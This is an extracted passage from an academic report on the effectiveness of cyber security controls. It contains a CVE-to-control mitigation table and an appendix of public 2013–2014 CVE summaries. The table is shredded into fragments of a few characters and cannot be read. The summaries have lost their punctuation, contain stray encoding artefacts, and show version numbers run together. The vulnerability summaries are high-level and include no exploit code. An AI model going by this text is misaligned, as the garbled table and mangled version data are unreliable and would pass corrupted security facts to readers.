lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-4
14
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-44
81
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
4-4
61
7y
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-4
63
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
4-6
04
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-6
10
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
13
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-6
36
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
69
yn
yy
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
78
nn
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
48
7n
ny
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-7
25
0n
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-7
92
7y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(A
cces
sC
on
tro
l)
Pat
chM
anag
emen
tC
VE
-20
14
-79
45
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-84
47
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-86
38
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-8
83
5y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-9
15
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-A
nti
-Mal
war
eP
atch
Man
agem
ent
[Tim
eD
elay
]C
VE
-20
14
-91
63
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
t[T
ime
Del
ay]
CV
E-2
01
4-9
35
0y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
-Do
sF
irm
war
eU
pd
ates
CV
E-2
01
4-9
35
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
Sec
ure
Co
nfi
gu
rati
on
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 18 of 28
CVE DetailsCVE-2013-0008
rdquowin32ksys in the kernel-mode driversin Microsoft Windows Vista SP2 x000DWindows Server 2008 SP2 R2 and R2 SP1Windows 7 Gold and SP1 x000D Windows8 Windows Server 2012 and Windows RTdoes not properly x000D handle windowbroadcast messages which allows localusers to gain x000D privileges via acrafted application aka rdquordquoWin32k ImproperMessage x000D Handling Vulnerabilityrdquordquordquo
CVE-2013-0022rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 9 allows x000D remoteattackers to execute arbitrary code viaa crafted web site that x000D triggersaccess to a deleted object aka rdquordquoInternetExplorer x000D LsGetTrailInfo Use AfterFree Vulnerabilityrdquordquordquo
CVE-2013-0084rdquoDirectory traversal vulnerability inMicrosoft SharePoint Server 2010 x000DSP1 and SharePoint Foundation 2010 SP1allows remote attackers to x000D bypassintended read restrictions for contentand hijack user x000D accounts via acrafted URL aka rdquordquoSharePoint DirectoryTraversal x000D Vulnerabilityrdquordquordquo
CVE-2013-0140SQL injection vulnerability in the Agent-Handler component in McAfee x000DePolicy Orchestrator (ePO) before 457and 46x before 466 allows x000Dremote attackers to execute arbitrary SQLcommands via a crafted x000D requestover the Agent-Server communicationchannel
CVE-2013-0149The OSPF implementation in Cisco IOS120 through 124 and 150 x000D through153 IOS-XE 2x through 39xS ASA andPIX 7x through 91 x000D FWSMNX-OS and StarOS before 14050488does not properly validate x000D LinkState Advertisement (LSA) type 1 packetsbefore performing x000D operations onthe LSA database which allows remoteattackers to cause x000D a denial ofservice (routing disruption) or obtainsensitive packet x000D information viaa (1) unicast or (2) multicast packetaka Bug IDs x000D CSCug34485CSCug34469 CSCug39762 CSCug63304and CSCug39795
CVE-2013-0172Samba 40x before 401 in certainActive Directory x000D domain-controllerconfigurations does not properly interpretAccess x000D Control Entries that arebased on an objectClass which allowsremote x000D authenticated users tobypass intended restrictions on modifyingLDAP x000D directory objects byleveraging (1) objectClass access by auser (2) x000D objectClass access by agroup or (3) write access to an attribute
CVE-2013-0174The external node classifier (ENC) APIin Foreman before 11 allows x000Dremote attackers to obtain the hashed rootpassword via an API x000D request
CVE-2013-0199The default LDAP ACIs in FreeIPA30 before 312 do not restrict x000Daccess to the (1) ipaNTTrustAuthIncomingand (2) x000D ipaNTTrustAuthOutgoingattributes which allow remote attackersto x000D obtain the Cross-Realm KerberosTrust key via unspecified vectors
CVE-2013-0253The default configuration of Apache Maven304 when using Maven x000D Wagon21 disables SSL certificate checks whichallows remote x000D attackers to spoofservers via a man-in-the-middle (MITM)attack
CVE-2013-0270OpenStack Keystone Grizzly before 20131Folsom and possibly earlier x000D allowsremote attackers to cause a denial of service(CPU and memory x000D consumption)via a large HTTP request as demonstratedby a long x000D tenant name whenrequesting a token
CVE-2013-0481The console in IBM Sterling B2B Integrator51 and 52 and Sterling File Gateway 21and 22 allows remote attackers to readstack traces by triggering (1) an error or(2) an exception
CVE-2013-0598Cross-site request forgery (CSRF)vulnerability in the Web Client in x000DIBM Rational ClearQuest 71 before71212 80 before 8008 and x000D801 before 8011 allows remote attackersto hijack the x000D authentication ofarbitrary users
CVE-2013-0619Adobe Reader and Acrobat 9x before 95310x before 1015 and x000D 11x before1101 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2012-1530 CVE-2013-0601 x000D CVE-2013-0605 CVE-2013-0616 CVE-2013-0620 and CVE-2013-0623
CVE-2013-0633Buffer overflow in Adobe Flash Playerbefore 10318351 and 11x before115502149 on Windows and Mac OSX before 10318351 and 11x before112202262 on Linux before 11111132on Android 2x and 3x and before11111537 on Android 4x allows remoteattackers to execute arbitrary code viacrafted SWF content as exploited in thewild in February 2013
CVE-2013-0649Use-after-free vulnerability in AdobeFlash Player before 10318363 and 11xbefore 116602168 on Windows before10318361 and 11x before 116602167on Mac OS X before 10318361 and11x before 112202270 on Linux before11111143 on Android 2x and 3x andbefore 11111547 on Android 4x AdobeAIR before 360597 and Adobe AIR SDKbefore 360599 allows attackers to executearbitrary code via unspecified vectors adifferent vulnerability than CVE-2013-0644
and CVE-2013-1374
CVE-2013-0746Mozilla Firefox before 180 Firefox ESR10x before 10012 and 17x x000Dbefore 1702 Thunderbird before 1702Thunderbird ESR 10x before x000D10012 and 17x before 1702 andSeaMonkey before 215 do not x000Dproperly implement quickstubs that usethe jsval data type for their x000D returnvalues which allows remote attackers toexecute arbitrary code x000D or cause adenial of service (compartment mismatchand application x000D crash) via craftedJavaScript code that is not properly handledduring x000D garbage collection
CVE-2013-0753Use-after-free vulnerability in theserializeToStream implementation x000Din the XMLSerializer component in MozillaFirefox before 180 Firefox x000D ESR10x before 10012 and 17x before1702 Thunderbird before x000D 1702Thunderbird ESR 10x before 10012 and17x before 1702 x000D and SeaMonkeybefore 215 allows remote attackers toexecute arbitrary x000D code via craftedweb content
CVE-2013-0787Use-after-free vulnerability in thensEditorIsPreformatted function x000Din editorlibeditorbasensEditorcppin Mozilla Firefox before x000D1902 Firefox ESR 17x before 1704Thunderbird before 1704 x000DThunderbird ESR 17x before 1704 andSeaMonkey before 2161 allows x000Dremote attackers to execute arbitrarycode via vectors involving an x000DexecCommand call
CVE-2013-0909The XSS Auditor in Google Chrome before2501364152 allows remote attackers toobtain sensitive HTTP Referer informationvia unspecified vectors
CVE-2013-1035The iTunes ActiveX control in Apple iTunesbefore 111 allows remote x000D attackersto execute arbitrary code or cause a denialof service x000D (memory corruption) viaa crafted web site
CVE-2013-1102The Wireless Intrusion Prevention System(wIPS) component on Cisco x000DWireless LAN Controller (WLC) deviceswith software 70 before x000D 70235071 and 72 before 721100 and 73before 731010 x000D allows remoteattackers to cause a denial of service(device reload) x000D via crafted IPpackets aka Bug ID CSCtx80743
CVE-2013-1140The XML parser in Cisco SecurityMonitoring Analysis and Response x000DSystem (MARS) allows remote attackers toread arbitrary files via an x000D externalentity declaration in conjunction with anentity reference x000D related to an XMLExternal Entity (XXE) issue aka Bug IDCSCue55093
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 19 of 28
CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055
CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676
CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389
CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo
CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386
CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors
CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd
CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU
CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect
confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity
CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169
CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function
CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document
CVE-2013-1669Multiple unspecified vulnerabilities in thebrowser engine in Mozilla x000D Firefoxbefore 210 allow remote attackers tocause a denial of x000D service (memorycorruption and application crash) or possiblyexecute x000D arbitrary code via unknownvectors
CVE-2013-1676The SelectionIteratorGetNextSegmentfunction in Mozilla Firefox before210 Firefox ESR 17x before 1706Thunderbird before 1706 andThunderbird ESR 17x before 1706 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsread) via unspecified vectors
CVE-2013-1700The Mozilla Maintenance Service in MozillaFirefox before 220 on x000D Windowsdoes not properly handle inability to launchthe Mozilla x000D Updater executablefile which allows local users to gainprivileges x000D via vectors involvingplacement of a Trojan horse executable fileat x000D an arbitrary location
CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action
CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject
CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate
CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors
CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897
CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation
CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671
CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341
CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)
CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack
CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 20 of 28
Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet
CVE-2013-2826WellinTech KingSCADA before312 KingAlarmampEvent before 31and x000D KingGraphic before 312perform authentication on the x000DKAEClientManager console rather than onthe server which allows x000D remoteattackers to bypass intended accessrestrictions and discover x000D credentialsvia a crafted packet to TCP port 8130
CVE-2013-2920The DoResolveRelativeHost functionin urlurl canon relativecc in x000DGoogle Chrome before 300159966 allowsremote attackers to cause a x000Ddenial of service (out-of-bounds read)via a relative URL containing a x000Dhostname as demonstrated by a protocol-relative URL beginning with a x000Dwwwgooglecom substring
CVE-2013-3064Open redirect vulnerability inuidynamicunsecuredhtml inLinksys x000D EA6500 with firmware1128147876 allows remote attackers toredirect x000D users to arbitrary web sitesand conduct phishing attacks via a URLin x000D the target parameter
CVE-2013-3116rdquoMicrosoft Internet Explorer 7 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2013-3137rdquoMicrosoft FrontPage 2003 SP3 does notproperly parse DTDs which allows remoteattackers to obtain sensitive information viacrafted XML data in a FrontPage documentaka rdquordquoXML Disclosure Vulnerabilityrdquordquordquo
CVE-2013-3194rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute x000D arbitrary codeor cause a denial of service (memorycorruption) via a x000D crafted website aka rdquordquoInternet Explorer MemoryCorruption x000D Vulnerabilityrdquordquordquo
CVE-2013-3199rdquoMicrosoft Internet Explorer 6 through10 allows remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted web site aka rdquordquoInternetExplorer Memory x000D CorruptionVulnerabilityrdquordquordquo
CVE-2013-3201rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3203 CVE-2013-3206 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3206
rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3201 CVE-2013-3203 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3280EMC RSA Authentication Agent 71xbefore 712 for Web for Internet x000DInformation Services has a fail-open designwhich allows remote x000D attackers tobypass intended access restrictions viavectors that x000D trigger an agent crash
CVE-2013-3387Cisco Prime Central for HostedCollaboration Solution (HCS)Assurance x000D 86 and 9x before 92(1)allows remote attackers to cause a denialof x000D service (disk consumption) via aflood of TCP packets to port 5400 x000Dleading to large error-log files aka Bug IDCSCua42724
CVE-2013-3417The administrative web interface in CiscoVideo Surveillance Operations Managerdoes not properly perform authenticationwhich allows remote attackers to watchvideo feeds via a crafted URL aka BugID CSCtg72262
CVE-2013-3632The Cron service in rpcphp inOpenMediaVault allows remote x000Dauthenticated users to execute cron jobs asarbitrary users and x000D execute arbitrarycommands via the username parameter
CVE-2013-3656Cybozu Office 910 and earlier doesnot properly manage sessions x000Dwhich allows remote attackers to bypassauthentication by leveraging x000Dknowledge of a login URL
CVE-2013-3856rdquoMicrosoft Word 2003 SP3 and WordViewer allow remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted Office document akardquordquoWord Memory Corruption x000DVulnerabilityrdquordquordquo
CVE-2013-3860rdquoMicrosoft NET Framework 20 SP2 3535 SP1 351 4 and 45 does x000Dnot properly parse a DTD during XMLdigital-signature validation x000D whichallows remote attackers to cause adenial of service x000D (application crashor hang) via a crafted signed XMLdocument aka x000D rdquordquoEntity ExpansionVulnerabilityrdquordquordquo
CVE-2013-3893Use-after-free vulnerability in theSetMouseCapture implementationin x000D mshtmldll in MicrosoftInternet Explorer 6 through 11 allowsremote x000D attackers to executearbitrary code via crafted JavaScript stringsas x000D demonstrated by use of an ms-help URL that triggers loading of x000Dhxdsdll
CVE-2013-3897rdquoUse-after-free vulnerability in theCDisplayPointer class in mshtmldll in
Microsoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via crafted JavaScript code thatuses the onpropertychange event handleras exploited in the wild in September andOctober 2013 aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2013-3900rdquoThe WinVerifyTrust function in MicrosoftWindows XP SP2 and SP3 Windows Server2003 SP2 Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and Windows RTGold and 81 does not properly validate PEfile digests during Authenticode signatureverification which allows remote attackersto execute arbitrary code via a craftedPE file aka rdquordquoWinVerifyTrust SignatureValidation Vulnerabilityrdquordquordquo
CVE-2013-3905rdquoMicrosoft Outlook 2007 SP3 2010 SP1and SP2 2013 and 2013 RT does x000Dnot properly expand metadata containedin SMIME certificates which x000Dallows remote attackers to obtain sensitivenetwork configuration and x000D stateinformation via a crafted certificate in an e-mail message aka x000D rdquordquoSMIME AIAVulnerabilityrdquordquordquo
CVE-2013-4223The Gentoo Nullmailer package before 111-r2 uses world-readable x000D permissionsfor etcnullmailerremotes which allowslocal users to x000D obtain SMTPauthentication credentials by reading thefile
CVE-2013-4436The default configuration for salt-ssh inSalt (aka SaltStack) 0170 x000D doesnot validate the SSH host key of requestswhich allows remote x000D attackers tohave unspecified impact via a man-in-the-middle (MITM) x000D attack
CVE-2013-4478Sup before 01321 and 014x before01411 allows remote attackers x000Dto execute arbitrary commands via shellmetacharacters in the filename x000D ofan email attachment
CVE-2013-4529Buffer overflow in hwpcipcie aerc inQEMU before 172 allows x000D remoteattackers to cause a denial of service andpossibly execute x000D arbitrary code viaa large log num value in a savevm image
CVE-2013-4555Cross-site request forgery(CSRF) vulnerability in x000Decrireactionlogoutphp in SPIP before2124 allows remote attackers x000D tohijack the authentication of arbitrary usersfor requests that x000D logout the uservia unspecified vectors
CVE-2013-4776NETGEAR ProSafe GS724Tv3 andGS716Tv2 with firmware 54113and x000D earlier GS748Tv454114 and GS510TP 5044 allowsremote x000D attackers to cause adenial of service (reboot or crash) viaa crafted x000D HTTP request tofilesystem
CVE-2013-4782
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 21 of 28
The Supermicro BMC implementationallows remote attackers to bypass x000Dauthentication and execute arbitrary IPMIcommands by using cipher x000D suite 0(aka cipher zero) and an arbitrary password
CVE-2013-5057rdquohxdsdll in Microsoft Office 2007 SP3 and2010 SP1 and SP2 does not implementthe ASLR protection mechanism whichmakes it easier for remote attackers toexecute arbitrary code via a crafted COMcomponent on a web site that is visitedwith Internet Explorer as exploited in thewild in December 2013 aka rdquordquoHXDS ASLRVulnerabilityrdquordquordquo
CVE-2013-5369IBM SPSS Analytical Decision Management61 before IF1 62 before x000D IF1 and70 before FP1 IF6 might allow remoteattackers to execute x000D arbitrary codeby deploying and accessing a service
CVE-2013-5428IBM WebSphere DataPower XC10appliances 250 do not require x000Dauthentication for all administrative actionswhich allows remote x000D attackers tocause a denial of service via unspecifiedvectors
CVE-2013-5431Open redirect vulnerability in IBM TivoliFederated Identity Manager x000D(TFIM) 611 before IF 15 620 beforeIF 14 621 and 622 before x000D IF8 and Tivoli Federated Identity ManagerBusiness Gateway (TFIMBG) x000D 611before IF 15 620 before IF 14 621 and622 before IF 8 x000D allows remoteattackers to redirect users to arbitrary websites and x000D conduct phishing attacksvia unspecified vectors
CVE-2013-5494Cross-site request forgery (CSRF)vulnerability in the web framework x000Din Cisco Unified MeetingPlace Solution asused in Unified x000D MeetingPlace WebConferencing and Unified MeetingPlaceallows remote x000D attackers to hijackthe authentication of arbitrary usersaka Bug IDs x000D CSCui45209 andCSCui44674
CVE-2013-5507The IPsec implementation in Cisco AdaptiveSecurity Appliance (ASA) x000D Software91 before 91(17) when an IPsec VPNtunnel is enabled x000D allows remoteattackers to cause a denial of service (devicereload) x000D via a (1) ICMP or (2)ICMPv6 packet that is improperly handledduring x000D decryption aka Bug IDCSCue18975
CVE-2013-5536Cisco Secure Access Control System (ACS)does not properly implement x000D anincoming-packet firewall rule which allowsremote attackers to x000D cause a denialof service (process crash) via a floodof crafted x000D packets aka Bug IDCSCui51521
CVE-2013-5559Buffer overflow in the Active TemplateLibrary (ATL) framework in the x000DVPNAPI COM module in Cisco AnyConnectSecure Mobility Client 2x x000D allowsuser-assisted remote attackers to executearbitrary code via a x000D crafted HTMLdocument aka Bug ID CSCuj58139
CVE-2013-5561The Safe Search enforcement feature inCisco Adaptive Security x000D Appliance(ASA) CX Context-Aware SecuritySoftware does not properly x000D performfiltering which allows remote attackers tobypass intended x000D policy restrictionsvia unspecified vectors aka Bug IDCSCui94622
CVE-2013-5751Directory traversal vulnerability in SAPNetWeaver 7x allows remote x000Dattackers to read arbitrary files viaunspecified vectors
CVE-2013-5757Absolute path traversal vulnerability inYealink VoIP Phone SIP-T38G allowsremote authenticated users to readarbitrary files via a full pathname in thedumpConfigFile function in the commandparameter to cgi-bincgiServerexx
CVE-2013-5828Unspecified vulnerability in the EnterpriseManager Base Platform x000D componentin Oracle Enterprise Manager Grid ControlEM Base Platform x000D 10205 and11101 EM DB Control 11107 11202and 11203 x000D and EM Pluginfor DB 12102 and 12103 allowsremote attackers to x000D affect integrityvia unknown vectors related to StorageManagement
CVE-2013-6167Mozilla Firefox through 27 sends HTTPCookie headers without first x000Dvalidating that they have the requiredcharacter-set restrictions x000D whichallows remote attackers to conduct theequivalent of a x000D persistent LogoutCSRF attack via a crafted parameterthat forces a x000D web application toset a malformed cookie within an HTTPresponse
CVE-2013-6188Cross-site request forgery (CSRF)vulnerability in HP System x000DManagement Homepage (SMH) 71through 722 allows remote attackersto x000D hijack the authentication ofunspecified victims via unknown vectors
CVE-2013-6284rdquoUnspecified vulnerability in the StatutoryReporting for Insurance x000D (FS SR)component in the Financial Servicesmodule for SAP ERP Central x000DComponent (ECC) allows attackersto execute arbitrary code via x000Dunspecified vectors related to a rdquordquocodeinjection vulnerabilityrdquordquordquo
CVE-2013-6396The OpenStack Python client libraryfor Swift (python-swiftclient) 10 x000Dthrough 190 does not verify X509certificates from SSL servers x000D whichallows man-in-the-middle attackers tospoof servers and obtain x000D sensitiveinformation via a crafted certificate
CVE-2013-6475Multiple integer overflows in (1)OPVPOutputDevcxx and (2) x000DoprsOPVPSplashcxx in the pdftoopvpfilter in CUPS and cups-filters x000Dbefore 1047 allow remote attackers toexecute arbitrary code via a x000D craftedPDF file which triggers a heap-based bufferoverflow
CVE-2013-6660The drag-and-drop implementation inGoogle Chrome before 3301750117 doesnot properly restrict the information inWebDropData data structures which allowsremote attackers to discover full pathnamesvia a crafted web site
CVE-2013-6699The Control and Provisioning of WirelessAccess Points (CAPWAP) x000D protocolimplementation on Cisco Wireless LANController (WLC) devices x000D allowsremote attackers to cause a denial of servicevia a crafted x000D CAPWAP packet thattriggers a buffer over-read aka Bug IDCSCuh81880
CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902
CVE-2013-6979The VTY authentication implementation inCisco IOS XE 0302xxSE and 0303xxSEincorrectly relies on the Linux-IOS internal-network configuration which allows remoteattackers to bypass authentication byleveraging access to a 192168x2 sourceIP address aka Bug ID CSCuj90227
CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network
CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username
CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28
